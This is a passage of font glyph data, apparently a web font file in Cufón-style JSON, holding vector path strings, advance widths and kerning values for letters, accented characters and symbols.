4v-52,0,-58,-40,-58,-94v0,-54,6,-94,58,-94xm76,-23v29,0,25,-35,25,-67v0,-33,4,-67,-25,-67v-29,0,-25,35,-25,67v0,33,-4,67,25,67","w":151},{"d":"94,-205r-20,-25r-21,25r-27,0r40,-51r15,0r40,51r-27,0xm54,-46v-2,27,23,20,33,4r10,-11r0,-127r33,0v1,60,-4,127,4,180v-23,3,-31,-5,-34,-24v-12,12,-24,27,-45,28v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134","w":152},{"d":"131,-41v-10,3,-21,9,-34,9r0,46r-24,0r0,-46v-42,-5,-47,-45,-47,-93v0,-48,6,-86,47,-92r0,-46r24,0r0,47v12,2,25,3,34,8r0,35v-15,-9,-28,-14,-40,-14v-32,0,-31,28,-31,62v0,34,-2,64,31,63v15,0,29,-6,40,-14r0,35"},{"d":"54,4v-7,48,51,38,78,25r0,34v-52,19,-113,10,-113,-59v0,-39,15,-61,48,-66r0,-46r33,0r0,77v-30,-2,-48,5,-46,35xm59,-159v0,-14,12,-25,25,-25v13,0,24,12,24,25v1,13,-11,24,-24,24v-13,0,-25,-11,-25,-24","w":149},{"d":"67,-46v6,47,-28,54,-73,47r0,-31v19,0,39,8,39,-21r0,-197r34,0r0,202","w":95},{"d":"51,-214v8,66,6,141,6,214r-29,0r0,-248r37,0r49,176v1,6,2,12,3,19v13,-70,36,-129,53,-195r37,0r0,248r-32,0r3,-184v1,-10,2,-19,3,-30r-16,69r-41,145r-16,0","w":234},{"d":"18,-172v22,-11,72,-20,89,3v30,-29,102,-17,91,43r0,41r-77,0v1,32,1,61,33,59v15,-1,29,-6,40,-14r0,32v-28,13,-89,22,-97,-18v-11,14,-23,30,-46,29v-28,0,-41,-20,-40,-51v0,-44,27,-68,76,-63v1,-23,1,-44,-23,-43v-20,1,-32,7,-46,15r0,-33xm167,-111v8,-36,-16,-61,-40,-36v-4,10,-6,21,-6,36r46,0xm87,-85v-45,-14,-61,52,-29,62v15,-1,23,-17,33,-25v-4,-10,-2,-25,-4,-37","w":217},{"d":"113,-8v-12,5,-25,10,-42,10v-50,1,-53,-40,-53,-92v-1,-53,4,-92,53,-92v16,0,30,6,42,10r0,34v-13,-9,-24,-13,-36,-13v-28,2,-26,30,-26,61v0,31,-3,61,26,61v15,-1,26,-5,36,-13r0,34","w":123,"k":{"'":4}},{"d":"12,-198v-2,-67,84,-47,147,-50r0,23r-23,0r0,297r-22,0r0,-297r-31,0r0,297r-22,0r0,-221v-29,-2,-49,-18,-49,-49","w":171},{"d":"86,-32r0,-29r45,-38r-45,-38r0,-29r80,61r0,12xm15,-32r0,-29r45,-38r-45,-38r0,-29r80,61r0,12","w":183},{"d":"77,-179v50,-20,60,37,60,89v0,54,-10,109,-62,89v-9,-4,-17,-13,-24,-20v-1,8,-5,17,-9,21r-24,0v9,-74,2,-166,4,-248r33,0r0,85v6,-7,13,-12,22,-16xm75,-28v31,12,29,-31,29,-62v0,-31,3,-73,-29,-62v-5,3,-15,14,-20,20r0,84v5,6,15,16,20,20","w":154,"k":{"'":18}},{"d":"61,1v-42,-3,-42,-45,-43,-91v-1,-53,4,-92,53,-92v16,0,30,6,42,10r0,34v-13,-9,-24,-13,-36,-13v-28,2,-26,30,-26,61v0,31,-3,61,26,61v15,-1,26,-5,36,-13r0,34v-10,4,-19,8,-34,9r-4,14v13,4,23,13,23,29v1,31,-44,34,-63,18r0,-18v10,7,42,21,43,-1v1,-11,-12,-13,-25,-12","w":123},{"d":"28,0r0,-248r95,0r0,31r-61,0r0,70r57,0r0,32r-57,0r0,83r65,0r0,32r-99,0xm75,-277r-42,-51r28,0r40,51r-26,0","w":144},{"d":"152,0r-27,0r-27,-139v-6,49,-16,94,-26,139r-28,0r-37,-180r31,0r21,141v3,-52,19,-94,27,-141r27,0r26,141v3,-51,15,-94,22,-141r29,0","w":196,"k":{".":4,",":4}},{"d":"75,-146v47,0,60,28,63,75v5,70,-63,89,-115,64r0,-38v24,21,83,28,83,-26v0,-27,-7,-41,-33,-40v-45,2,-53,-28,-57,-73v-6,-68,61,-80,110,-57r0,37v-22,-17,-82,-30,-78,20v2,26,5,38,27,38","k":{"Y":7,"X":4,"V":4,"T":4}},{"d":"129,-121v0,24,-8,46,-33,46v-22,0,-30,-18,-47,-22v-10,1,-11,6,-13,18r-22,0v0,-26,8,-46,33,-46v23,-1,28,22,48,22v11,0,10,-7,13,-18r21,0","w":146},{"d":"54,-46v-2,27,23,20,33,4r10,-11r0,-127r33,0v1,60,-4,127,4,180v-23,3,-31,-5,-34,-24v-12,12,-24,27,-45,28v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134xm102,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm46,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":152},{"d":"68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0xm97,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm41,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":142},{"d":"87,-115v-57,-17,-7,-141,-82,-139r0,-22v51,2,75,40,74,97v-1,37,15,49,41,57r0,14v-27,7,-42,20,-41,56v1,58,-22,96,-74,97r0,-22v74,3,25,-122,82,-138","w":137},{"d":"90,-205r-21,-25r-20,25r-27,0r40,-51r15,0r40,51r-27,0xm68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0","w":142},{"d":"33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0xm108,-309v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm52,-309v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":163},{"d":"62,-27v48,18,40,-48,39,-95xm76,-157v-40,0,-22,63,-25,107r42,-100v-4,-5,-9,-7,-17,-7xm119,-166v27,49,28,207,-69,165r-7,19r-20,0r12,-29v-33,-51,-29,-212,69,-167r9,-20r19,0","w":151},{"d":"95,-277r-20,-25r-21,25r-26,0r40,-51r14,0r40,51r-27,0xm28,0r0,-248r95,0r0,31r-61,0r0,70r57,0r0,32r-57,0r0,83r65,0r0,32r-99,0","w":144},{"d":"97,-205r-20,-25r-21,25r-26,0r39,-51r15,0r40,51r-27,0xm78,-184v52,-2,52,44,50,96r-77,0v-1,35,1,62,33,62v15,0,28,-6,40,-14r0,32v-14,4,-29,11,-49,11v-52,0,-56,-40,-57,-93v0,-55,8,-92,60,-94xm97,-114v-1,-24,2,-44,-20,-43v-22,1,-26,15,-26,43r46,0","w":147},{"d":"62,-109v36,1,54,19,54,57v0,57,-59,65,-100,47r0,-32v21,12,71,24,70,-15v0,-19,-7,-25,-26,-25v-35,0,-50,-18,-50,-55v0,-54,55,-60,96,-43r0,32v-23,-12,-65,-25,-65,11v0,18,5,23,21,23","w":126,"k":{"'":9}},{"d":"87,-252v65,1,67,60,67,128v0,69,-4,128,-67,128v-64,0,-67,-61,-67,-128v0,-67,2,-128,67,-128xm87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96xm87,-277r-26,0r40,-51r29,0","w":174},{"d":"107,-219v-19,-4,-47,-8,-42,20r0,19r42,0r0,27r-42,0r0,153r-34,0r0,-153r-23,0r0,-27r23,0v-9,-57,20,-81,76,-67r0,28","w":106,"k":{"t":7,"i":9,"f":9,".":18,",":18,"'":-14,"\"":-14}},{"d":"27,0r0,-153r-19,0r0,-27r53,0r0,180r-34,0xm23,-228v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21","w":86},{"d":"29,0r0,-248r34,0r0,248r-34,0xm41,-277r-42,-51r28,0r40,51r-26,0","w":91},{"d":"148,-124v0,54,-26,85,-86,80r0,44r-34,0r0,-248r34,0r0,43v59,-5,86,27,86,81xm114,-124v0,-34,-14,-54,-52,-49r0,97v39,5,52,-13,52,-48","w":156},{"d":"65,-205r-26,0r40,-51r29,0","w":145},{"d":"27,0r0,-153r-19,0r0,-27r53,0r0,180r-34,0xm38,-205r-26,0r40,-51r29,0","w":86},{"d":"96,0r-37,0r-53,-248r35,0r38,220v8,-78,25,-148,39,-220r32,0","w":155,"k":{"s":13,"o":14,"g":14,"e":14,"d":14,"c":14,"a":11,"A":7,";":11,":":11,".":32,",":32}},{"d":"28,0r0,-248r95,0r0,31r-61,0r0,70r57,0r0,32r-57,0r0,83r65,0r0,32r-99,0","w":144,"k":{"'":-4}},{"d":"91,-95r0,95r-34,0r0,-95r-54,-153r35,0r38,115v10,-41,26,-76,38,-115r31,0","w":147,"k":{"z":14,"x":14,"v":11,"u":18,"s":16,"r":11,"q":18,"p":11,"o":22,"n":11,"m":11,"g":22,"e":25,"d":22,"c":22,"a":22,"S":4,"O":5,"G":5,"E":4,"C":5,"A":11,";":14,":":14,".":36,",":36}},{"d":"62,-252v37,0,43,30,44,67v0,39,-8,68,-44,68v-38,0,-45,-29,-45,-68v0,-38,7,-67,45,-67xm62,-140v19,0,17,-24,17,-45v0,-21,2,-45,-17,-45v-20,0,-18,23,-18,45v0,22,-2,45,18,45","w":123},{"d":"55,-248r-2,151v16,-29,36,-55,54,-83r33,0r-50,70r48,110r-34,0r-34,-82r-15,21r0,61r-33,0r0,-248r33,0","w":141},{"d":"-9,39v19,6,35,5,35,-20r0,-199r33,0r0,200v5,45,-26,57,-68,47r0,-28xm21,-228v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21","w":84},{"d":"136,-318v4,40,-39,47,-60,22v-10,-7,-18,-1,-19,12r-17,0v1,-21,7,-38,27,-38v21,-1,43,36,51,4r18,0xm87,-252v65,1,67,60,67,128v0,69,-4,128,-67,128v-64,0,-67,-61,-67,-128v0,-67,2,-128,67,-128xm87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96","w":174},{"d":"62,-217r0,70r55,0r0,32r-55,0r0,115r-34,0r0,-248r93,0r0,31r-59,0","w":133,"k":{"A":2,".":22,",":22,"'":-11,"\"":-7}},{"d":"78,-184v52,-2,52,44,50,96r-77,0v-1,35,1,62,33,62v15,0,28,-6,40,-14r0,32v-14,4,-29,11,-49,11v-52,0,-56,-40,-57,-93v0,-55,8,-92,60,-94xm97,-114v-1,-24,2,-44,-20,-43v-22,1,-26,15,-26,43r46,0xm79,-205r-26,0r40,-51r29,0","w":147},{"d":"80,-152v-32,-12,-29,30,-29,62v0,33,-3,73,29,62v5,-3,14,-13,19,-20r0,-84v-5,-7,-14,-17,-19,-20xm136,-180v-5,61,-3,129,-3,194v0,63,-60,67,-105,47r0,-33v19,13,74,33,71,-12r0,-33v-8,10,-22,19,-37,21v-43,-3,-42,-47,-44,-94v-2,-54,10,-109,62,-89v9,4,17,12,23,20v2,-8,6,-16,10,-21r23,0","w":154,"k":{"'":7}},{"d":"116,-246v-1,21,-7,38,-28,38v-21,1,-43,-39,-51,-4r-17,0v1,-21,7,-38,27,-38v21,-1,43,36,51,4r18,0xm68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0","w":142},{"d":"8,0r0,-15r56,-138r-51,0r0,-27r91,0r0,15r-57,138r60,0r0,27r-99,0","w":114,"k":{"z":-4,"'":4}},{"d":"76,-184v50,0,58,40,58,94v0,54,-8,94,-58,94v-52,0,-58,-40,-58,-94v0,-54,6,-94,58,-94xm76,-23v29,0,25,-35,25,-67v0,-33,4,-67,-25,-67v-29,0,-25,35,-25,67v0,33,-4,67,25,67xm75,-205r-42,-51r28,0r40,51r-26,0","w":151},{"d":"99,-98v18,10,25,30,25,60v0,49,-16,77,-64,75v-17,0,-37,-5,-48,-9r0,-35v27,18,87,22,78,-30v4,-40,-21,-48,-60,-45r0,-30v34,2,59,-3,56,-38v7,-47,-48,-39,-73,-25r0,-35v52,-17,113,-8,106,60v-2,25,-6,43,-20,52","w":142},{"d":"18,-21v0,-13,11,-24,24,-24v13,0,25,11,25,24v0,14,-11,25,-25,25v-13,0,-24,-12,-24,-25","w":91,"k":{"'":58,"\"":58}},{"d":"78,-184v52,-2,52,44,50,96r-77,0v-1,35,1,62,33,62v15,0,28,-6,40,-14r0,32v-14,4,-29,11,-49,11v-52,0,-56,-40,-57,-93v0,-55,8,-92,60,-94xm97,-114v-1,-24,2,-44,-20,-43v-22,1,-26,15,-26,43r46,0xm106,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm50,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":147},{"d":"21,0r0,-32r29,0r0,-142r-29,13r0,-33v19,-9,31,-25,63,-21r0,183r29,0r0,32r-92,0","w":131},{"d":"109,-109r0,46r-20,0r0,-46r-30,0r0,46r-21,0r0,-46r-27,0r0,-20r27,0r0,-55r-27,0r0,-20r27,0r0,-46r21,0r0,46r30,0r0,-46r20,0r0,46r27,0r0,20r-27,0r0,55r27,0r0,20r-27,0xm89,-184r-30,0r0,55r30,0r0,-55","w":146},{"d":"77,-171v10,0,18,8,18,18v0,10,-8,18,-18,18v-11,0,-18,-7,-18,-18v0,-11,7,-18,18,-18xm18,-87r0,-24r117,0r0,24r-117,0xm59,-45v-1,-16,19,-23,30,-13v11,11,3,31,-12,31v-10,0,-18,-8,-18,-18"},{"d":"34,-209r0,-19r79,0r0,19r-79,0","w":136},{"d":"44,-251v34,-4,41,43,24,62v20,19,15,75,-24,69v-10,-1,-20,-3,-27,-6r0,-25v13,6,38,18,38,-8v0,-20,-13,-18,-31,-18r0,-22v15,0,29,4,29,-14v0,-23,-23,-11,-36,-7r0,-25v7,-2,18,-6,27,-6","w":97},{"d":"137,-90v2,52,-10,109,-60,89v-9,-4,-16,-9,-22,-16r0,85r-33,0r0,-316r33,0r0,85v9,-10,21,-21,38,-21v43,0,42,47,44,94xm75,-28v31,12,29,-31,29,-62v0,-31,3,-73,-29,-62v-5,3,-15,14,-20,20r0,84v5,6,15,17,20,20","w":154},{"d":"27,0r0,-153r-19,0r0,-27r53,0r0,180r-34,0xm68,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm12,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":86},{"w":64},{"d":"86,15v33,6,28,60,-10,57v-12,-1,-22,-5,-30,-10r0,-18v10,7,42,21,43,-1v1,-11,-12,-13,-25,-12r10,-39r19,-1","w":148},{"d":"27,0r0,-153r-19,0r0,-27r53,0r0,180r-34,0xm30,-205r-42,-51r28,0r40,51r-26,0","w":86},{"d":"40,58r-25,0r11,-89r37,0xm18,-148v0,-13,11,-25,24,-25v14,0,25,11,25,25v0,13,-12,24,-25,24v-13,0,-24,-11,-24,-24","w":91},{"d":"87,-28v52,0,28,-92,32,-151r-53,142v6,6,10,9,21,9xm87,-220v-53,7,-28,94,-31,156r53,-146v-4,-7,-12,-10,-22,-10xm87,4v-15,0,-23,-2,-33,-8r-8,22r-21,0r14,-36v-16,-25,-20,-59,-19,-106v2,-67,2,-128,67,-128v14,0,26,3,35,9r9,-23r20,0r-14,38v14,25,17,60,17,104v0,69,-4,128,-67,128","w":174},{"d":"102,-277r-20,-25r-21,25r-27,0r40,-51r15,0r40,51r-27,0xm33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0","w":163},{"d":"130,-318v4,40,-39,47,-60,22v-10,-7,-18,-1,-19,12r-18,0v2,-20,7,-38,27,-38v21,-1,44,36,52,4r18,0xm33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0","w":163},{"d":"123,-90v26,37,5,94,-51,94v-20,0,-35,-5,-48,-9r0,-32v23,13,80,25,80,-15v0,-22,-9,-28,-31,-26v-50,5,-69,-49,-46,-84v-36,-59,25,-116,96,-81r0,32v-17,-8,-32,-13,-48,-13v-16,1,-27,5,-27,23v0,20,9,24,26,25v53,-9,75,50,49,86xm53,-149v-18,32,12,46,47,44v8,-22,1,-42,-27,-42v-7,0,-13,-1,-20,-2","w":151},{"d":"73,1v-53,-7,-53,-63,-53,-125v0,-67,0,-125,63,-126v19,-1,37,7,51,12r0,39v-11,-8,-28,-18,-47,-17v-39,3,-33,48,-33,92v0,43,-6,91,33,91v20,0,34,-8,47,-17r0,40v-11,6,-26,9,-42,11r-4,14v33,6,28,60,-10,57v-12,-1,-22,-5,-30,-10r0,-18v10,7,42,21,43,-1v1,-10,-12,-13,-25,-12","w":146},{"d":"68,-286v25,0,38,17,41,40v-2,24,-16,40,-41,40v-24,0,-40,-15,-40,-40v0,-24,16,-40,40,-40xm68,-225v12,0,21,-9,21,-21v0,-11,-10,-20,-21,-20v-11,0,-20,8,-20,20v0,12,8,21,20,21xm68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0","w":142},{"d":"119,-215v5,67,-15,108,-39,146v-15,23,-11,64,-11,103r-33,0v-4,-67,9,-119,37,-155v12,-15,13,-36,13,-62r-79,0r0,-32r112,0","w":134,"k":{"4":11,".":22,",":14}},{"d":"33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0xm87,-277r-26,0r40,-51r29,0","w":163},{"d":"70,0r-24,0r102,-248r23,0xm18,-121r0,-24r14,0r0,-74r-14,7r0,-25v11,-5,20,-13,39,-11r0,103r14,0r0,24r-53,0xm202,-94v-2,35,-28,44,-38,71r39,0r0,23r-63,0v-7,-48,32,-55,38,-94v-3,-21,-25,-5,-38,-1r0,-26v25,-12,65,-13,62,27","w":223},{"d":"36,68r0,-172r33,0r0,172r-33,0xm28,-159v0,-14,12,-25,25,-25v13,0,24,12,24,25v1,13,-11,24,-24,24v-13,0,-25,-11,-25,-24","w":105},{"d":"33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0xm76,-277r-42,-51r28,0r40,51r-26,0","w":163},{"d":"120,-32r0,66r-33,0r0,-66r-83,0r0,-20r85,-164r31,0r0,157r20,0r0,27r-20,0xm89,-163v-16,36,-35,70,-53,104r51,0v1,-34,-2,-73,2,-104","k":{"4":-7}},{"d":"134,-10v-13,5,-31,13,-51,12v-63,-1,-63,-59,-63,-126v0,-67,0,-125,63,-126v19,-1,37,7,51,12r0,39v-11,-8,-28,-18,-47,-17v-39,3,-33,48,-33,92v0,43,-6,91,33,91v20,0,34,-8,47,-17r0,40","w":146},{"d":"82,-218v58,0,61,51,61,111v0,60,-5,111,-61,111v-56,0,-61,-51,-61,-111v0,-60,3,-111,61,-111xm82,-26v34,-3,27,-43,27,-81v0,-37,8,-81,-27,-81v-34,0,-28,43,-28,81v0,38,-6,77,28,81","w":162},{"d":"122,-135v49,25,41,142,-30,135r-64,0r0,-248r54,0v60,-6,70,79,40,113xm106,-181v0,-29,-13,-41,-44,-37r0,72v30,3,44,-6,44,-35xm62,-31v37,4,57,-5,57,-42v0,-34,-19,-47,-57,-42r0,84","w":167,"k":{"Y":11,"X":4,"V":5,"'":11}},{"d":"130,-180v1,60,-4,127,4,180r-23,0v-5,-5,-9,-14,-11,-24v-12,12,-21,29,-46,27r0,65r-34,0r0,-248r34,0r0,134v-2,27,22,20,33,5r10,-12r0,-127r33,0","w":152},{"d":"82,-251v61,-6,72,84,42,115v41,19,41,137,-20,137v-15,0,-24,-1,-33,-6r0,-35v8,5,15,10,27,9v21,0,18,-20,20,-42v3,-35,-12,-46,-47,-42r0,-32v28,4,37,-8,36,-35v-1,-23,-4,-35,-25,-36v-19,0,-26,9,-25,29r0,189r-33,0r0,-188v-1,-42,19,-59,58,-63","w":162},{"d":"29,0r0,-248r34,0r0,248r-34,0xm53,-277r-26,0r40,-51r29,0","w":91},{"d":"102,-162r-29,-52r-28,52r-33,0r53,-87r17,0r52,87r-32,0","w":145},{"d":"90,-93r0,-12r79,-61r0,29r-45,38r45,38r0,29xm19,-93r0,-12r79,-61r0,29r-45,38r45,38r0,29","w":183},{"d":"167,-148v0,63,-13,103,-75,103v-61,0,-75,-40,-75,-103v0,-63,15,-103,75,-103v60,0,75,40,75,103xm149,-148v0,-49,-6,-84,-57,-84v-51,0,-56,34,-56,84v-1,51,5,85,56,85v52,0,57,-35,57,-85xm95,-204v31,-3,36,48,17,62r19,49r-23,0r-17,-43r-6,0r0,43r-21,0r0,-111r31,0xm103,-170v0,-11,-6,-16,-18,-14r0,28v12,2,18,-3,18,-14","w":183},{"d":"136,-9v-12,6,-29,14,-47,13v-49,-1,-52,-43,-57,-91r-18,0r0,-24r17,0r0,-27r-17,0r0,-23r18,0v5,-48,8,-90,57,-91v18,-1,35,7,47,13r0,39v-13,-12,-46,-28,-60,-8v-8,11,-7,27,-9,47r45,0r0,23r-46,0r0,27r46,0r0,24r-45,0v3,28,0,56,28,56v18,0,31,-9,41,-18r0,40","w":151},{"d":"53,-252v29,0,40,22,40,53v0,31,-11,52,-40,53v-29,0,-41,-20,-41,-53v0,-33,12,-53,41,-53xm69,0r-22,0r101,-248r22,0xm165,-102v29,0,40,22,40,53v0,31,-11,52,-40,53v-29,0,-41,-20,-41,-53v0,-33,12,-53,41,-53xm53,-170v12,-2,15,-11,15,-29v0,-18,-2,-29,-15,-29v-15,0,-17,10,-17,29v0,19,3,27,17,29xm165,-21v13,0,15,-11,15,-28v0,-18,-2,-29,-15,-29v-15,0,-17,10,-17,29v0,18,2,28,17,28","w":221},{"d":"148,-54v0,36,-25,58,-61,58v-36,0,-61,-22,-61,-58r0,-194r34,0r0,193v0,18,10,26,28,26v18,0,27,-8,27,-26r0,-193r33,0r0,194xm77,-277r-42,-51r28,0r40,51r-26,0","w":174},{"d":"108,2r-102,-252r22,0r101,252r-21,0","w":136},{"d":"148,-54v0,36,-25,58,-61,58v-36,0,-61,-22,-61,-58r0,-194r34,0r0,193v0,18,10,26,28,26v18,0,27,-8,27,-26r0,-193r33,0r0,194xm89,-277r-26,0r40,-51r29,0","w":174},{"d":"40,58r-25,0r11,-89r37,0","w":91,"k":{"'":61,"\"":61}},{"d":"70,0r-24,0r102,-248r23,0xm18,-121r0,-24r14,0r0,-74r-14,7r0,-25v11,-5,20,-13,39,-11r0,103r14,0r0,24r-53,0xm185,-31r0,31r-24,0r0,-31r-41,0r0,-15r45,-82r20,0r0,77r10,0r0,20r-10,0xm161,-51v0,-14,-1,-29,2,-41v-6,14,-13,28,-20,41r18,0","w":216},{"d":"20,-244v32,-12,79,-15,79,34v0,30,-3,65,3,90v-15,1,-25,0,-27,-13v-19,26,-61,17,-61,-23v0,-32,22,-47,58,-43v9,-40,-36,-30,-52,-16r0,-29xm72,-177v-30,-10,-44,30,-21,37v17,-1,24,-15,21,-37","w":115},{"d":"87,-252v65,1,67,60,67,128v0,69,-4,128,-67,128v-64,0,-67,-61,-67,-128v0,-67,2,-128,67,-128xm87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96xm84,-277r-42,-51r28,0r40,51r-26,0","w":174},{"d":"138,-205v-16,-15,-65,-32,-65,12r0,48r53,0r0,29r-53,0r0,84r68,0r0,32r-121,0r0,-32r20,0r0,-84r-20,0r0,-29r20,0v-1,-54,-5,-107,50,-107v19,0,35,8,48,12r0,35"},{"d":"95,0r-34,0r0,-42r-39,0r0,-23r39,0r0,-26r-39,0r0,-23r32,0r-47,-134r35,0r38,115r38,-115r32,0r-48,134r33,0r0,23r-40,0r0,26r40,0r0,23r-40,0r0,42"},{"d":"87,-252v65,1,67,60,67,128v0,69,-4,128,-67,128v-64,0,-67,-61,-67,-128v0,-67,2,-128,67,-128xm87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96","w":174,"k":{"Z":7,"Y":5,"X":4,"T":4}},{"d":"75,-179v51,-20,62,36,62,89v0,52,-10,109,-60,89v-9,-4,-16,-9,-22,-16r0,85r-33,0r0,-198v1,-16,-2,-37,-4,-50r24,0v4,4,8,13,9,21v7,-7,15,-16,24,-20xm75,-28v31,12,29,-31,29,-62v0,-31,3,-73,-29,-62v-5,3,-15,14,-20,20r0,84v5,6,15,17,20,20","w":154,"k":{"'":18}},{"d":"74,0r-24,0r101,-248r24,0xm74,-189v18,20,15,75,-24,69v-10,0,-21,-3,-28,-6r0,-25v13,6,39,18,38,-8v3,-21,-13,-18,-30,-18r0,-22v15,0,28,3,28,-14v0,-23,-22,-12,-35,-7r0,-25v26,-12,64,-6,59,31v1,12,-4,19,-8,25xm189,-31r0,31r-24,0r0,-31r-41,0r0,-15r44,-82r21,0r0,77r9,0r0,20r-9,0xm165,-51v0,-14,-1,-29,2,-41r-21,41r19,0","w":216},{"d":"75,-143v38,0,60,17,60,56v0,35,-20,49,-48,55r0,46r-23,0r0,-45v-15,0,-28,-6,-40,-9r0,-32v23,11,80,27,80,-15v0,-23,-11,-24,-31,-25v-36,-1,-55,-16,-55,-55v0,-33,17,-48,46,-50r0,-46r23,0r0,46v11,1,28,5,36,9r0,32v-20,-12,-73,-28,-75,9v-1,20,10,24,27,24"},{"d":"54,-113v55,-5,75,21,75,74v0,48,-15,77,-62,76v-17,1,-35,-5,-45,-10r0,-35v25,20,79,22,73,-30v-3,-26,-4,-44,-29,-44r-43,0r0,-133r100,0r0,32r-69,0r0,70","w":146},{"d":"89,-87r0,53r-24,0r0,-53r-47,0r0,-24r47,0r0,-53r24,0r0,53r46,0r0,24r-46,0"},{"d":"28,2r-21,0r101,-252r22,0","w":136},{"d":"113,-217v76,0,91,50,91,126v0,42,-8,76,-43,76v-13,0,-21,-8,-25,-18v-8,8,-19,20,-33,20v-36,0,-36,-38,-38,-77v-2,-44,11,-91,53,-72v6,4,13,8,17,14v2,-7,5,-12,8,-16r20,0v-7,29,-4,71,-4,106v0,13,0,21,10,22v18,-5,16,-31,17,-55v1,-64,-8,-108,-73,-108v-66,0,-73,44,-73,108v0,64,7,108,73,108v29,0,44,-5,61,-17r0,22v-15,9,-36,13,-61,13v-76,2,-91,-50,-91,-126v0,-76,15,-126,91,-126xm93,-90v-4,41,14,69,39,35r0,-70v-7,-6,-12,-17,-24,-17v-18,4,-13,28,-15,52","w":219},{"d":"78,-1v-50,20,-60,-37,-60,-89v0,-54,10,-109,62,-89v9,4,17,12,23,20v2,-8,6,-16,10,-21r23,0v-6,78,-2,165,-3,248r-34,0r0,-85v-5,7,-13,12,-21,16xm80,-152v-32,-12,-29,30,-29,62v0,33,-3,73,29,62v5,-3,14,-13,19,-20r0,-84v-5,-7,-14,-17,-19,-20","w":154,"k":{"'":11}},{"d":"32,-279v34,40,64,93,64,164v0,71,-30,124,-64,164r-27,0v31,-40,64,-91,64,-164v0,-72,-33,-124,-64,-164r27,0","w":123},{"d":"131,-161v0,67,-65,75,-78,129r81,0r0,32r-114,0v-13,-87,72,-92,78,-159v4,-41,-56,-23,-78,-12r0,-35v42,-19,111,-20,111,45","w":149},{"d":"80,-358v24,0,40,16,40,40v0,24,-15,40,-40,40v-25,0,-41,-15,-41,-40v0,-24,16,-40,41,-40xm80,-297v11,0,20,-10,20,-21v0,-11,-9,-20,-20,-20v-11,0,-21,9,-21,20v0,12,9,21,21,21xm33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0","w":163},{"d":"124,-246v4,40,-38,47,-59,22v-10,-7,-19,-1,-20,12r-17,0v1,-21,7,-37,27,-38v21,-1,43,36,51,4r18,0xm53,-153v22,-40,82,-43,82,23r0,130r-33,0r0,-134v2,-27,-24,-20,-34,-4r-13,14r0,124r-33,0v-1,-60,4,-127,-4,-180r24,0v5,5,9,17,11,27","w":155},{"d":"98,-175r31,40r-23,17r-28,-43r-28,43r-23,-17r31,-40r-49,-14r8,-27r49,18r-2,-52r28,0r-2,52r48,-18r9,27","w":155},{"d":"25,36r0,-22r49,0r0,-258r-49,0r0,-22r74,0r0,302r-74,0","w":141},{"d":"42,-180v6,5,10,21,12,32v14,-13,24,-35,48,-36r0,43v-24,-7,-34,14,-47,25r0,116r-33,0v-1,-60,4,-127,-4,-180r24,0","w":104,"k":{".":14,",":18}},{"d":"16,-243v52,-19,113,-10,113,59v0,39,-15,